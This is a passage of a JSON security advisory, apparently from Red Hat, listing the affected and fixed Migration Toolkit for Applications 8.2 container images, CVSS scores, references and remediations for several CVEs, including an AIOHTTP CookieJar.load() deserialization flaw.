"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "net: golang: Go net package: Denial of Service via long CNAME response in LookupCNAME"
},
{
"cve": "CVE-2026-34993",
"cwe": {
"id": "CWE-502",
"name": "Deserialization of Untrusted Data"
},
"discovery_date": "2026-06-02T20:01:12.690409+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2484099"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in AIOHTTP, an asynchronous HTTP client/server framework for asyncio and Python. An attacker could exploit this vulnerability by providing untrusted input to the `CookieJar.load()` function. This could potentially lead to arbitrary code execution, allowing the attacker to run malicious code on the affected system. This issue is most likely to occur in applications that allow attacker-controlled files to be loaded.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "aiohttp: AIOHTTP: Arbitrary code execution via untrusted input to CookieJar.load()",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This is an Important flaw in AIOHTTP, a Python asynchronous HTTP framework, due to potential arbitrary code execution. The vulnerability arises when applications load untrusted input into the `CookieJar.load()` function. Exploitation requires an application to be configured to process attacker-controlled files, which is not a default or common scenario in most Red Hat product deployments.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64"
],
"known_not_affected": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-34993"
},
{
"category": "external",
"summary": "RHBZ#2484099",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2484099"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-34993",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-34993"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-34993",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34993"
},
{
"category": "external",
"summary": "https://github.com/aio-libs/aiohttp/commit/dcf40f30637e8752c76781cf6703b5a236749a00",
"url": "https://github.com/aio-libs/aiohttp/commit/dcf40f30637e8752c76781cf6703b5a236749a00"
},
{
"category": "external",
"summary": "https://github.com/aio-libs/aiohttp/security/advisories/GHSA-jg22-mg44-37j8",
"url": "https://github.com/aio-libs/aiohttp/security/advisories/GHSA-jg22-mg44-37j8"
}
],
"release_date": "2026-06-02T18:29:15.847000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-07-21T22:10:10+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.",
"product_ids": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:43038"
},
{
"category": "workaround",
"details": "Applications using AIOHTTP that are configured to load untrusted files via the `CookieJar.load()` function should implement input sanitization prior to loading. This prevents the injection of malicious code.",
"product_ids": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "aiohttp: AIOHTTP: Arbitrary code execution via untrusted input to CookieJar.load()"
},
{
"cve": "CVE-2026-35397",
"cwe": {
"id": "CWE-22",
"name": "Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)"
},
"discovery_date": "2026-05-05T20:01:20.132731+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64",
